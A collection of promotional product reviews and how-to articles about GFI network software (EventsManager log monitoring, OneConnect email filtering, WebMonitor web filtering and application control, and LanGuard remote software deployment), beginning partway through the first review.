One key issue is the use of SQL-Server as the database back-end. If you have an existing installation you can use that if capacity permits, or you could download SQL Server Express from Microsoft. GFI do tell you about this but it’s hidden away in Appendix 3 of the manual, and an early section giving deployment examples might have been useful.

That said, once you get installed a handy wizard pops up to lead you through the key things you need to set up:

reviews-eventsmanager-1

Here again are things you’ll need to think about – such as who will get alerted, how, when and for what, and what actions need to be taken.

You’ll also need to give EventsManager a user that has administrative access to the machines you want to monitor and perhaps the safest way to do this is to set up a new user dedicated to that purpose.

Once you’ve worked through the wizard you can add your monitored machines under the various categories previously mentioned. Ready-made categories allow you to monitor according to the type, function or importance of the target machine and if you don’t like those you can edit them or create your own.

reviews-eventsmanager-2

The categories are more than just cosmetic; each one can be set up to define how aggressively EventsManager monitors the machines, their ‘working week’, (useful for catching unauthorised out-of-hours activity) and the types of events you’re interested in (you might not want Security logs from your workstations, for example). Encouragingly though, the defaults provided are completely sensible and can be used without worry.

reviews-eventsmanager-3

Once your targets are defined you’ll begin seeing logs in the Events Browser, and this is where the product really scores. To the left of the browser is a wealth of well-thought-out categories and types; click on one of these and you’ll see those events from across your enterprise. It’s as simple, and as wonderful as that.

reviews-eventsmanager-4

You can click on the higher-level categories to view, for example, all the SQL Server events, or you can expand that out and view the events by subcategory (just the Failed SQL Server Logons for example).

Again, if there are events of particular significance in your environment you can edit the categories to include them or even create your own, right down to the specifics of the event IDs and event types they collect. A particularly nice category is ‘Noise’, which you can use to collect all that day-to-day operational verbiage and keep it out of the way

For maximum benefit you’ll also want to assign actions to key categories or events. These can be real-time alerts, emails, corrective action scripts and log archiving. And again, you guessed it, this is fully customisable. The ability to run external scripts is particularly nice as with a bit of tweaking you can make the product do anything you like.

reviews-eventsmanager-5

Customisation is one of the real keys to this product. Install it out of the box, just as it comes, and you’ll find it useful. But invest some time in tailoring it to suit your organisation and you’ll increase its value so much you’ll wonder how you ever managed without it.

In operation the product proved stable though perhaps a little on the slow side when switching between screens and particularly when starting up. This is a testimony to the fact that the product is doing a lot of work on your behalf and, to get the best from it, you really should give it a decent system to run on. The benefits you’ll gain will more than make up for the investment.

  • Hits: 17518

GFI OneConnect – Stop Ransomware, Malware, Viruses, and Email hacks Before They Reach Your Exchange Server

gfi-oneconnect-ransomware-malware-virus-datacenter-protection-1aGFI Software has just revealed GFI OneConnect Beta – its latest Advanced Email Security Protection product. GFI OneConnect is a comprehensive solution that targets the safe and continuous delivery of business emails to organizations around the world.

GFI has leveraged its years of experience with its millions of business users around the globe to create a unique Hybrid solution consisting of an on-premise server and Cloud-based solution that helps IT admins and organizations protect their infrastructure from spam, malware threats, ransomware, virus and email service outages.  

GFI OneConnect not only takes care of filtering all incoming email for your Exchange server but it also works as a backup service in case your Exchange server or cluster is offline.

The solution consists of the GFI OneConnect Server that is installed on the customer’s premises. The OneConnect server connects to the local Exchange server on one side, and the GFI OneConnect Data Center on the other side as shown in the diagram below:

Deployment model of GFI OneConnect (Server & Data Center)

Figure 1. Deployment model of GFI OneConnect (Server & Data Center)

Email sent to the organization’s domain is routed initially through the GFI OneConnect . During this phase email is scanned by the two AntiVirus engines (ClamAV & Kaspersky) for virus, ransomware, malware etc. before forwarding them to the Exchange Server.

In case the Exchange server is offline GFI OneConnect’s Continuity mode will send and receive all emails, until the Exchange server is back online after which all emails are automatically synchronised. All emails received while your email server was down are available to users at any moment, thanks to the connection to the cloud and the GFI OneConnect’s Datacenter.

Deployment model of GFI OneConnect (Server & Data Center)

Figure 2. GFI OneConnect Admin Dashboard (click to enlarge)

While there is currently a beta version out - our first impressions show that this is an extremely promising solution that has been carefully designed with the customer and IT staff in mind. According to GFI – the best is yet to come – and we know that GFI always stands by its promises so we are really looking forward seeing the final version of this product in early 2017.

If you’ve been experiencing issues with your Exchange server continuity or have problems dealing with massive amounts of spam emails, ransomware and other security threats – give GFI OneConnectBeta a test run and discover how it can help offload all these problems permanently, leaving you time for other more important tasks.

  • Hits: 8719

Enforcing ICT Policies - How to Block Illegal & Unwanted Websites from your Users and Guests

Enforcing ICT Policies - How to Block Illegal & Unwanted Websites for your Users and GuestsEnsuring users follow company policies when accessing the internet has become a real challenge for businesses and IT staff. The legal implications for businesses not taking measures to enforce acceptable user policies (where possible) can become very complicated and businesses can, in fact, be held liable for damages caused by their users or guests.

A good example, found in almost every business around the world, is the offering of guest internet access to visitors. While they are usually unaware of the company’s ICT policies (nor do they really care about them) they are provided with free unrestricted access to the internet.

Sure, the firewall will only allow DNS, HTTP and HTTPS traffic in an attempt to limit internet access and its abuse but who’s ensuring they are not accessing illegal sites/content such as pornography, gambling, etc., which are in direct violation of the ICT policy?

This is where solutions like GFI WebMonitor help businesses cover this sensitive area by quickly filtering website categories in a very simple and effective way that makes it easy for anyone to add or remove specific website categories or urls.

How To Block Legal Liability Sites

Enforcing your ICT Internet Usage Policy via WebMonitor is a very simple and fast process. From the WebMonitor web-based dashboard, click on Manage and select Policies:

Note: Click on any image to enlarge it and view it in high-resolution

Adding a new Policy in GFI WebMonitorFigure 1. Adding a new Policy in GFI WebMonitor

At the next screen, click on Add Policy:

Click on the GFI WebMonitor Add Policy buttonFigure 2. Click on the GFI WebMonitor Add Policy button

At the next screen add the desired Policy Name and brief description below:

Creating the Web Policy in GFI WebMonitor using the WEBSITE elementFigure 3. Creating the Web Policy in GFI WebMonitor using the WEBSITE element

Now click and drag the WEBSITES element (on the left) into the center of the screen as shown above.

Next, configure the policy to Block traffic matching the filters we are about to create and optionally enable temporary access from users if you wish:

Selecting Website Categories to be blocked and actions to be takenFigure 4. Selecting Website Categories to be blocked and actions to be taken

Under the Categories section click inside the Insert a Site Category field to reveal a drop-down list of the different categories. Select a category by clicking on it and then click on the ‘+’ symbol to add the category to this policy. Optionally you can click on the small square icon next to the ‘+’ symbol to get a pop-up window with all the categories.

Optionally select to enable full URL logging and then click on the Save button at the top right corner to save and enable the policy.

The new policy will now appear on the Policies dashboard:

enforce-ict-policies-block-illegal-and-unwanted-websites-5

Figure 5. Our new WebMonitor policy is now active

If for any reason you need to disable the policy all you need to do is click on the green power button on the left and the policy is disabled immediately. A very handy feature that allows administrators to take immediate action when they notice unwanted effects from the new policies.

After the policy was enabled we tried accessing a gambling website from one of our workstations and received the following message on our web browser:

Our new policy blocks users from accessing gambling sites

Figure 6. Our new policy blocks users from accessing gambling sites

The GFI WebMonitor Dashboard reporting Blocking/Warning hits on the company’s policies:

GFI WebMonitor reports our Internet usage ICT Policy is being hit

Figure 7. GFI WebMonitor reports our Internet usage ICT Policy is being hit (click for full dashboard image)

Summary

The importance of properly enforcing an ICT Internet Usage Policy cannot be underestimated. It can not only save the company from legal implications but also its users and guests from their very own actions. Solutions such as GFI WebMonitor are designed to help businesses effectively apply ICT Policies and control usage of high-risk resources such as the internet.

  • Hits: 11310

Minimise Internet Security Threats, Scan & Block Malicious Content, Application Visibility and Internet Usage Reporting for Businesses

gfi-webmonitor-internet-usage-reporting-block-malicious-content-1aFor every business, established or emerging, the Internet is an essential tool which has proved to be indispensable. The usefulness of the internet can be counteracted by abuse of it, by a business’s employees or guests. Activities such as downloading or sharing illegal content, visiting high risk websites and accessing malicious content are serious security risks for any business.

There is a very easy way of monitoring, managing and implementing effective Internet usage. GFI WebMonitor can not only provide the aforementioned, but also provide real – time web usage. This allows for tracking bandwidth utilisation and traffic patterns. All this information can then be presented on an interactive dashboard. It is also an effective management tool, providing a business with the internet usage records of its employees.

Such reports can be highly customised to provide usage information based on the following criteria/categories:

  • Most visited sites
  • Most commonly searched phrases
  • Where most bandwidth is being consumed
  • Web application visibility

Some of the sources for web abuse that can be a time sink for employees are social media and instant messaging (unless the business operates at a level where these things are deemed necessary). Such web sites can be blocked.

GFI WebMonitor can also achieve other protective layers for the business by providing the ability to scan and block malicious content. WebMonitor helps the business keep a close eye on its employees’ internet usage and browsing habits, and provides an additional layer of security.

On its main dashboard, as shown below, the different elements help in managing usage and traffic source and targets:

WebMonitor’s Dashboard provides in-depth internet usage and reporting

Figure 1. WebMonitor’s Dashboard provides in-depth internet usage and reporting

WebMonitor’s main dashboard contains a healthy amount of information allowing administrators and IT managers to obtain important information such as:

  • See how many Malicious Sites were blocked and how many infected files detected.
  • View the Top 5 Users by bandwidth
  • Obtain Bandwidth Trends such as Download/Upload, Throughput and Latency
  • Number of currently active web sessions.
  • Top 5 internet categories of sites visited by the users
  • Top 5 Web Applications used to access the internet

Knowing which applications are used to access the internet is very important to any business. Web applications like YouTube, Bittorrent, etc. can be clearly identified and blocked, providing IT managers and administrators a ringside view of web utilisation.

On the flip side, if a certain application or website is blocked and a user tries to access it, he/she will encounter an Access Denied page rendered by GFI WebMonitor. This notification should be enough for the user to be deterred from trying it again:

WebMonitor effectively blocks malicious websites while notifying users trying to access it

Figure 2. WebMonitor effectively blocks malicious websites while notifying users trying to access it

For the purpose of this article, a deliberate attempt was made to download an ISO file using Bittorent. As per the policy the download page was part of the block policy. Hence GFI WebMonitor not only blocked the user from accessing the file, it also displayed the violation stating the user’s machine IP Address and the policy that was violated. This is a clear demonstration of how the management of web application can be effective.

Some of the other great dashboards include bandwidth insight. The following image shows the total download and upload for a specific period. The projected values and peaks can be easily traced as well.

WebMonitor’s Bandwidth graphs help monitor the organisation’s upload/download trafficFigure 3. WebMonitor’s Bandwidth graphs help monitor the organisation’s upload/download traffic (click to enlarge)

Another useful dashboard is that of activity. This provides information about total users, their web request, and a projection of the next 30 days, as shown in the following image:

WebMonitor allows detailed tracking of current and projected user web requests with very high accuracyFigure 4. WebMonitor allows detailed tracking of current and projected user web requests with very high accuracy (click to enlarge)

The Security dashboard is perhaps one of the most important. This shows all the breaches based on category, type and top blocked web based applications that featured within certain policy violations.

The Security dashboard allows tracking of web security incidents and security policy violationsFigure 5. The Security dashboard allows tracking of web security incidents and security policy violations (click to enlarge)

Running Web Reports

The easiest way to manage and produce the information gathered is to run reports. The various categories provided allow the user to run and view information of Internet usage depending on management requirements. The following image shows the different options available on the left panel:

WebMonitor internet web usage reports are highly customisable and provide detailed informationFigure 6. WebMonitor internet web usage reports are highly customisable and provide detailed information (click to enlarge)

But often management would rather take a pulse of the current situation. GFI WebMonitor caters to that requirement very well. The best place to look for instant information regarding certain key aspects of resource usage is the Web Insights section.

If management wanted to review the bandwidth information, the following dashboard would give that information readily:

The Web Insight section keeps an overall track of internet usageFigure 7. The Web Insight section keeps an overall track of internet usage (click to enlarge)

This provides a percentage view of how much data contributes to download or upload.

Security Insights shows all current activities and concerns that needs attention:

WebMonitor Security Insights dashboard displaying important web security reportsFigure 8. WebMonitor Security Insights dashboard displaying important web security reports (click to enlarge)

Conclusion

There is no doubt GFI WebMonitor becomes a very effective tool that allows businesses to monitor and control internet access for employees, guests and other internet users. Its intuitive interface allows administrators and IT Managers to quickly obtain the information they require but also put the necessary security policies in place to minimise security threats and internet resource abuse.

  • Hits: 11122

Increase your Enterprise or SMB Organization Security via Internet Application & User Control. Limit Threats and Internet Abuse at the Workplace

gfi-webmonitor-internet-application-user-control-1aIn this era of constantly pushing for more productivity and greater efficiency, it is essential that every resource devoted to web access within a business is utilised for business benefit. Unless the company concerned is in the business of gaming or social media, etc. it is unwise to use resources like internet/web access, and the infrastructure supporting it, for a purpose other than business. Like they say, “Nothing personal, just business”

With this in mind, IT administrators have their hands full ensuring management of web applications and their communication with the Internet. The cost of not ensuring this is loss of productivity, misuse of bandwidth and potential security breaches. As a business it is prudent to block any unproductive web application e.g. gaming, social media etc. and restrict or strictly monitor file sharing to mitigate information leakages.

It is widely accepted that in this area firewalls are of little use. Port blocking is not the preferred solution as it has a similar effect to a sledge hammer. What is required is the fineness of a scalpel to parse out the business usage from the personal and manage those business requirements accordingly. To be able to manage web application at such a level, it is essential to be able to identify and associate the request with its respective web application. Anything in line with business applications goes through, the rest are blocked.

This is where WebMonitor excels in terms of delivering this level of precision and efficiency. It identifies access requests from supported applications using inspection technology and helps IT administrators to allow or block them. Hence, the administrators can allow certain applications for certain departments while blocking certain other applications as part of a blanket ban, thus enhancing the browsing experience of all users.

So, to achieve this, the process is to use the unified policy system of WebMonitor. The policies can be configured specifically for application control or, within the same policy, several application controls can be combined using other filtering technologies.

Let’s take a look at the policy panel of WebMonitor:

gfi-webmonitor-internet-application-user-control-1Figure 1. WebMonitor Policy Panel interface. Add, delete, create internet access policies with ease (click to enlarge)

In order to discover the controls that are available against a certain application, the application needs to be dragged into the panel. For example, if we were to create a policy to block Google Drive we would be dragging that into the panel itself.

Once the related controls show up, we can select an application or application category the policy will apply to.

The rest of the configuration from this point will allow creating definitions for the following:

  • Filter options
  • Scope of the policy
  • Actions to be taken
  • Handling of exceptions
  • Managing notifications

All of the above are ready to be implemented in a ‘drag – and – drop’ method. GFI WebMonitor will commence controlling access of the configured application to the Internet the moment the policy is saved.

So, going back to the example of creating the ‘block Google Drive’ policy, the steps are quite simple:

1. Click on ‘Add Policy’ as show in the following image:

gfi-webmonitor-internet-application-user-control-2

Figure 2. Click on the “Add Policy” button to being creating a policy to block internet access

Enter a Name and description in the relevant fields:

gfi-webmonitor-internet-application-user-control-3Figure 3. Adding policy name and description in WebMonitor to block an application network-wide (click to enlarge)

3. As this policy applies to ‘all’, at this moment there is no need to configure the scope. This can be done on a per user, group or IP address only basis.

4. Drag in the Application Block from the left panel (as shown in the following image), Select ‘Block’ in the ‘Allow, Block, Warn, Monitor’ section.

5. In the Application Category section, select ‘File Transfer’ as shown in the image below:

gfi-webmonitor-internet-application-user-control-4Figure 4. WebMonitor: Blocking the File Transfer application category from the internet (click to enlarge)

6. Click on the ‘Applications’ Tab and start typing ‘Google Drive’ in the field. The drop down list will include Google Drive. Select it and then press enter. The application will be added. Now Click on Save.

We need to keep in mind that the policy is operational the moment the Save button, located at the top right corner, is clicked.

Now if any user tries to access the web application Google Drive, he/she will be presented with the ‘Block Page’ rendered by GFI WebMonitor. At the same time, any Google Drive thick client installed on the user’s machine will not be able to connect to the Internet

As mentioned earlier, and reiterated through the above steps, the process of creating and implementing a web access management policy in WebMonitor is quite simple. Given the length and breadth of configuration options within the applications and the scope, this proves to be a very powerful tool that will make the task of managing and ensuring proper usage of web access, simple and effective for IT Administrators in small and large enterprise networks.

  • Hits: 10689

GFI WebMonitor Installation: Gateway / Proxy Mode, Upgrades, Supported O/S & Architectures (32/64bit)

WebMonitor is an awarded gateway monitoring and internet access control solution designed to help organizations deal with user internet traffic, monitor and control bandwidth consumption, protect computers from internet malware/viruses and other internet-based threats plus much more. GFI WebMonitor supports two different installation modes: Gateway mode and Simple Proxy mode. We’ll be looking into each mode and help administrators and engineers understand which is best, along with the prerequisites and caveats of each mode.

Proxy vs Gateway Mode

Proxy mode, also named Simple Proxy mode is the simplest way to install GFI WebMonitor. You can deploy this on any computer that has access to the internet. In Simple Proxy mode, all client web-browser traffic (HTTP/HTTPS) is directed through GFI WebMonitor. To enable this type of setup, you will need an internet facing router that can forward traffic and block ports.

With GFI WebMonitor functioning in Simple Proxy mode, each client machine must also be configured to use the server as a web proxy for HTTP and HTTPS protocols. GFI WebMonitor comes with built-in Web Proxy Auto-Discovery (WPAD) server functionality that makes the process easy - simply enable automatic discovery of proxy server for each of your client machines and they should automatically find and use WebMonitor as a proxy. In case of a domain environment, it is best to regulate this setting using a Group Policy Object (GPO).

When WebMonitor is configured to function in Internet Gateway mode, all inbound and outbound client traffic will pass through GFI WebMonitor, irrespective of whether the traffic is HTTP or non-HTTP. With Internet Gateway mode, the client browser does not need to point to any specific proxy – all that’s required is to enable the Transparent Proxy function in GFI WebMonitor.

Supported OS & Architectures

Whether functioning as a gateway or a web proxy, GFI WebMonitor processes all web traffic. For a smooth operation that amounts to using a server architecture capable of handling all the requests every day. When the environment is small (10-20 nodes), for instance, a 2 GHz processor and 4 GB RAM minimum with a 32-bit Windows operating system architecture will suffice.

Larger environments, such as those running the Windows Server operating system on a minimum of 8 GB RAM and multi-core CPU will require the 64-bit architecture. GFI WebMonitor works with both 32- as well as 64-bit Windows operating system architectures starting from Windows 2003 and Windows Vista.

Installation & Upgrading

When installing for the first time, GFI WebMonitor starts by detecting its prerequisites. If the business is already using GFI WebMonitor, the process determines the prerequisites according to the older product instance. If the installation kit encounters an older instance, it imports the previous settings and redeploys them after completing the installation.

Whether installing for the first time or upgrading an older installation, the installation kit looks for any setup prerequisites necessary and installs them automatically. However, some prerequisites may require user interaction and these will come up as separate installation processes with their own user interfaces.

Installing GFI WebMonitor

As with all GFI products, installation is a very easy follow-the-bouncing-ball process. Once the download of GFI WebMonitor is complete, execute the installer using an account with administrative privileges.

If WebMonitor has been recently downloaded, you can safely skip the newer build check. When ready, click Next to proceed:

gfi-webmonitor-installation-setup-gateway-proxy-mode-1

Figure 1. Optional check for a new WebMonitor edition during installation

You will need to fill in the username and/or the IP address that will have administrative access to the web-interface of GFI WebMonitor, then click Next to select the folder to install GFI WebMonitor and finally start the installation process:

gfi-webmonitor-installation-setup-gateway-proxy-mode-2

Figure 2. Selecting Host and Username that are allowed to access the WebMonitor Administration interface.

Once the installation process is complete, click Finish to finalize the setup and leave the Open Management Console checked:

gfi-webmonitor-installation-setup-gateway-proxy-mode-3

Figure 3. Installation complete – Open Management Console

After this, the welcome screen of the GFI WebMonitor Configuration Wizard appears. This will allow you to configure the server to operate in Simple Proxy Mode or Gateway Mode. At this point, it is recommended you enable JavaScript in Internet Explorer or the web browser of your choice before proceeding further:

gfi-webmonitor-installation-setup-gateway-proxy-mode-4aFigure 4. The welcome screen once WebMonitor installation has completed

After clicking on Get Started to proceed, we need to select which of the two modes GFI WebMonitor will be using. We selected Gateway mode to ensure we get the most out of the product as all internet traffic will flow through our server and provide us with greater granularity & control:

gfi-webmonitor-installation-setup-gateway-proxy-mode-5aFigure 5. Selecting between Simple Proxy and Gateway mode

The Transparent Proxy can be enabled at this stage, allowing web browser clients to automatically configure themselves using the WPAD protocol. WebMonitor shows a simple network diagram to help understand how network traffic will flow to and from the internet:

gfi-webmonitor-installation-setup-gateway-proxy-mode-6aFigure 6. Internet traffic flow in WebMonitor’s Gateway Mode

Administrators can select the port at which the Transparent Proxy will function and then click Save and Test Transparent Proxy. GFI WebMonitor will confirm Transparent Proxy is working properly.

Now, click Next to see your trial license key or enter a new license key. Click on Next to enable HTTPS scanning.

HTTPS Scanning gives you visibility into secure surfing sessions that can threaten the network's security. Malicious content may be included in sites visited or files downloaded over HTTPS. The HTTPS filtering mechanism within GFI WebMonitor enables you to scan this traffic. There are two ways to configure HTTPS Proxy Scanning Settings, via the integrated HTTPS Scanning Wizard or manually.

Thanks to GFI WebMonitor’s flexibility, administrators can add any HTTPS site to the HTTPS scanning exclusion list so that it bypasses inspection.

If HTTPS Scanning is disabled, GFI WebMonitor enables users to browse HTTPS websites without decrypting and inspecting their contents.

When ready, click Next again and provide the full path of the database. Click Next again to enter and validate the Admin username and password. Then, click Next to restart the services. You can now enter your email details and click Finish to end the installation.

gfi-webmonitor-installation-setup-gateway-proxy-mode-7aFigure 7. GFI WebMonitor’s main control panel

Once the installation and initial configuration of GFI WebMonitor is complete, the system will begin gathering useful information on our users’ internet usage.

In this article we examined WebMonitor Simple Proxy and Gateway installation mode and saw the benefits of each method. We proceeded with the Gateway mode to provide us with greater flexibility, granularity and reporting of our users’ internet usage. The next articles will continue covering in-depth functionality and reporting of GFI’s WebMonitor.

  • Hits: 13326

GFI WebMonitor: Monitor & Secure User Internet Activity, Stop Illegal File Sharing - Downloads (Torrents), Web Content Filtering For Organizations

gfi-webmonitor-internet-filtering-block-torrents-applications-websites-reporting-1In our previous article we analysed the risks and implications involved for businesses when there are no security or restriction policies and systems in place to stop users distributing illegal content (torrents). We also spoke about unauthorized access to company systems, sharing sensitive company information and more. This article talks about how specialized systems such as WebMonitor are capable of helping businesses stop torrent applications accessing the internet, control the websites users access, block remote control software (Teamviewer, Remote Desktop, Ammy Admin etc) and put a stop to users wasting bandwidth, time and company money while at work.

WebMonitor is more than just an application. It can help IT departments design and enforce internet security policies by blocking or allowing specific applications and services accessing the internet.

WebMonitor is also capable of providing detailed reports of users’ web activity – a useful feature that ensure users are not accessing online resources they shouldn’t, and provide the business with the ability to check users’ activities in case of an attack, malware or security incident.

WebMonitor is not a new product - it carries over a decade of development and has served millions of users since its introduction into the IT market. With awards from popular IT security magazines, Security Experts, IT websites and more, it’s the preferred solution when it comes to a complete web filtering and security monitoring solution.

Blocking Unwanted Applications: Application Control – Not Port Control

Blocking Unwanted Applications: Application ControlSenior IT Managers, engineers and administrators surely remember the days where controlling TCP/UDP ports at the Firewall level was enough to block or provide applications access to the internet. For some years now, this is no longer a valid way of application control, as most ‘unwanted’ applications can smartly use common ports such as HTTP (80) or HTTPS (443) to circumvent security policies, passing inspection and freely accessing the internet.

In order to effectively block unwanted applications, businesses must realize that it is necessary to have a security Gateway device that can correctly identify the applications requesting access to the internet, regardless the port they are trying to use – aka Application Control.

Application Control is a sophisticated technique that requires upper layer (OSI Model) inspection of data packets as they flow through the gateway or proxy, e.g. GFI WebMonitor. The gateway/proxy executes deep packet level inspection to identify the application requesting access to the internet.

In order to correctly identify the application the gateway must be aware of it, which means it has to be listed in its local database.

The Practical Benefits Of Internet Application Control & Web Monitoring Solution

Let’s take a more practical look at the benefits an organization has when implementing an Application Control & Web Monitoring solution:

  • Block file sharing applications such as Torrents
  • Stop users distributing illegal content (games, applications, movies, music, etc)
  • Block remote access applications such as TeamViewer, Remote Desktop, VNC, Ammy Admin and more.
  • Stop unauthorized access to the organization’s systems via remote access applications
  • Block access to online storage services such as DropBox, Google Drive, Hubic and others
  • Avoid users sharing sensitive information such as company documents via online storage services
  • Save valuable bandwidth for the organization, its users, remote branches and VPN users
  • Protect the network from malware, viruses and other harmful software downloadable via the internet
  • Properly enforce different security policies to different users and groups
  • Protect against possible security breaches and minimize responsibility in case of an infringement incident
  • And much more

The above list contains a few of the major benefits that solutions such as WebMonitor can offer to organizations.

Why Web Monitoring & Content Filtering is Considered Mandatory

Web Monitoring is a very sensitive topic for many organizations and its users, mainly because users do not want others to know what they are doing on their computer. The majority of users perceive web monitoring as spying on them to see what sites they are accessing and if they are wasting time on websites and internet resources unrelated to work, however, users do not understand the problems and security risks that are mostly likely to arise if no monitoring or content filtering mechanism is in place.

In fact the damage caused by users irresponsibly visiting high-risk sites and surfing the internet without any limits is way bigger than most companies might think and there are some really great examples that help prove this point. The USA FBI site has a page with examples of internet scams and risks from social media network sites.

If we assume your organization is one of the luckiest ones that hasn’t been hit (yet) from irresponsible user internet activities, then we are here to assure you that it’s simply a matter of time.

Stop wasting company bandwidth from user downloadsApart from the imminent security risk, users who have uncontrollable access are also wasting bandwidth – that’s bandwidth the organization is paying for - and are likely to slow down the internet for the rest who are legitimately trying to get work done. In cases where VPNs are running over the same lines then VPN users, remote branches and mobile users are most likely to experience slow connection speeds when accessing the organization’s resources over the internet.

This problem becomes even more evident when asymmetrical WAN lines are in use, such as ADSL lines. With asymmetrical WAN lines, a single user who is uncontrollably uploading photos, movies (via torrent) or other content can affect all other users downloading since bottlenecks can easily occur when one of the two streams (downstream or upstream) is in heavy usage. This is a main characteristic of asymmetrical WAN lines.

Finally, if there is an organization security policy in place it’s most likely to contain fair internet usage guidelines for users and specify what they can and cannot do using the organization’s internet resources. The only way to enforce such a policy is through a sophisticated web monitoring & policy enforcement mechanism such as GFI WebMonitor.

Summary

In this article we analysed how specialized web monitoring and control application software, such as WebMonitor, are able to control which user applications are able to access the internet, control websites users within an organization can access, block internet content while saving valuable bandwidth. With such solutions, organizations are able to enforce their internet security policies while at the same time protecting themselves from unauthorized access to their systems (remote desktop software), stop illegal activities such as torrent file sharing and more.

  • Hits: 12579

Dealing with User Copyright Infringement (Torrents), Data Loss Prevention (DLP), Unauthorized Remote Control Applications (Teamviewer, RDP) & Ransomware in the Business Environment

GFI WebMonitor - Control user copyright infringement in the Business EnvironmentOne of the largest problems faced by organizations of any size is effectively controlling user internet access (from laptops, mobile devices, workstations etc), minimizing the security threats for the organization (ransomware – data loss prevention), user copyright infringement (torrent downloading/sharing movies, games, music etc) and discover where valuable WAN-Internet bandwidth is being wasted.

Organizations clearly understand that using a Firewall is no longer adequate to control the websites its users are able to access, remote control applications (Teamviewer, Radmin, Ammyy Admin, Remote desktop etc), file sharing applications - Bittorrent clients (uTorrent, BitComet, Deluge, qBittorrent etc), online cloud storage services (Dropbox, OneDrive, Google Drive, Box, Amazon Cloud Drive, Hubic etc) and other services and applications.

The truth is that web monitoring applications such as GFI’s WebMonitor are a lot more than just a web proxy or internet monitoring solution.

Web monitoring applications are essential for any type or size of network as they offer many advantages:

  • They stop users from abusing internet resources
  • They block file-sharing applications and illegal content sharing
  • They stop users using cloud-based file services to upload sensitive documents, for example saving company files to their personal DropBox, Google Drive etc.
  • They stop remote control applications connecting to the internet (e.g Teamviewer, Remote Desktop, Ammy Admin etc)
  • They ensure user productivity is kept high by allowing access to approved internet resources and sites
  • They eliminate referral ad sites and block abusive content
  • They support reputation blocking to automatically filter websites based on their reputation
  • They help IT departments enforce security policies to users and groups
  • They provide unbelievable flexibility allowing any type or size of organization to customise its internet usage policy to its requirements

The Risk In The Business Environment – Illegal Downloading

GFI WebMonitor The Risk in the Business Environment – Illegal DownloadingMost Businesses are completely unaware of how serious these matters are and the risks they are taking while dealing with other ‘more important’ matters.

Companies such as the Motion Picture Association of America (MPAA) and the Recording Industry Association of America (RIAA) are in a continuous battle suing and fighting with companies, ISPs and even home users for illegally distributing movies and music.

Many users are aware of this and are now turning to their company’s internet resources, which in many cases offer faster and unlimited data transfer, to download their illegal content such as movies, games, music and other material.

An employer or business can be easily held responsible for the actions of its employees when it comes to illegal download activities, especially if no policies or systems are in place.

In the case of an investigation, if the necessary security policies and web monitoring systems are in place with the purpose of preventing copyright infringement and illegal downloading, businesses are less vulnerable to the illegal implications of their users, plus it allows them to track down and find the person responsible.

Data Loss Prevention (DLP) – Stop Users From Uploading Sensitive/Critical Documents

GFI WebMonitor Stop Users from Uploading Sensitive - Critical Company DocumentsWhile illegal downloading is one major threat for businesses, stopping users sharing company data and sensitive information (aka Data Loss Prevention or DLP) is another big problem.

With the explosion of (free) cloud-based storage services such as DropBox, OneDrive, Google Drive and others, users can quickly and easily upload any type of document directly from their workplace to their personal cloud storage and instantaneously share it with anyone in the world, without the company’s consent or knowledge.

The smartly designed cloud-storage applications are able to use HTTP & HTTPS to transfer files, and circumvent firewall security policies and other types of protection.

More specialised application proxies such as GFI’s WebMonitor can effectively detect and block these applications, saving businesses major security breaches and damages.

Block Unauthorized Remote Control Applications (TeamViewer, Ammy Admin, Remote Desktop, VNC etc) & Ransomware

Remote control applications such as Teamviewer, Ammy Admin, Remote Desktop and others have been causing major security issues in organizations around the world. In most cases, users run these clients so they can then remotely access and control their workstation from home, continuing their “downloads” or transfer files to their home PC and other unauthorized activities.

In other cases, these remote applications become targets for pirates and hackers, who try to hijack sessions that have been left running by users.

Ransomware is a new type of threat where, through an application running on the user’s workstations, hackers are able to gain access and encrypt files found on the computers, even network drives and shares within a company.

GFI WebMonitor - Avoid Ransomware - Hackers via Remote Desktop/Control ApplicationsIn late 2015, popular Ammy Admin – a remote control software, was injected with malicious code and unaware home and corporate users downloaded and used the free software. Infected by at least five different malware versions, they gave attackers full access and control over the PC. Some of the malware facilitated stealing banking details, encrypting user files in exchange for money to decrypt them and many more.

In another case during 2015, attackers began installing ransomware on computers running Remote Desktop Services. The attackers obtained access via brute-force attack and then installed their malware which started scanning for specific file extensions. A ransom of $1000 USD was requested in order to have the files decrypted.

Blocking this type of applications is a major issue for companies as users uncontrollably make use of them, not realizing they are putting their company at serious risk.

Use of such applications should be heavily monitored and restricted because they pose a significant threat to businesses.

GFI’s WebMonitor’s extensive application list has the ability to detect and effectively block these and many other similar applications, putting an end to this major security threat.

Summary

The internet today is certainly not a safe place for users or organizations. Security threats resulting from users downloading and distributing illegal content, sharing company sensitive information, uncontrollably accessing their systems from home or other locations and the potential hazard of attackers gaining access to internal systems via RDP programs, is real. Avoid getting your company caught with its pants down and seek ways to tighten and enforce security policies that will help protect them from these ever present threats.

  • Hits: 9792

Automate Software Deployment with the Help of GFI LanGuard. Quick & Easy Software Installation on all PCs – Workstations & Servers

Deploying a single application to hundreds of workstations or servers can become a very difficult and time-consuming task. Thankfully, remote deployment of software and applications is a feature offered by GFI LanGuard. With Remote Software Deployment, we can automate the installation of pretty much any software to any amount of computers on the network, including Windows servers (2003,2008, 2012), Domain Controllers, Windows workstations and other.

In this article we’ll show how easy it is to deploy any custom software using GFI LanGuard. For our demonstration purposes, we’ll deploy Mozilla Firefox to a Windows server.

To begin configuring the deployment, select the Remediate tab from GFI LanGuard, then select the Deploy Custom Software option as shown below:

Preparing the network-wide deployment of Mozilla Firefox through GFI LanGuard

Figure 1. Preparing the network-wide deployment of Mozilla Firefox through GFI LanGuard

Next, select the target machine from the left panel. We can select one or multiple targets using the CTRL key. For our demonstration, we selected the DCSERVER which is a Windows 2003 server.

Now, from the Deploy Custom Software section, click on Add to select the software to be deployed. This will present the Add Custom Software window where we can select the path to the installation file. GFI LanGuard also provides the ability to run the setup file using custom parameters – this handy feature allows the execution of silent installations (no window/prompt shown at the target machine desktop), if supported by the application to be installed. Mozilla Firefox supports silent installation using the ‘ –ms ‘ parameter:

GFI LanGuard custom software deployment using a parameter for silent installation Figure 2. GFI LanGuard custom software deployment using a parameter for silent installation

When done, click on the Add button to return back to the main screen where GFI LanGuard will display the target computer(s) & software selected, plus installation parameters:

GFI LanGuard ready to deploy Mozilla Firefox on a Windows Server

Figure 3. GFI LanGuard ready to deploy Mozilla Firefox on a Windows Server

Clicking on the Deploy button brings up the final window where we can either initiate the deployment immediately or schedule it for a later time. From here, we can also insert any necessary credentials but also select to notify the remote user, force a reboot after the installation and many other useful options:

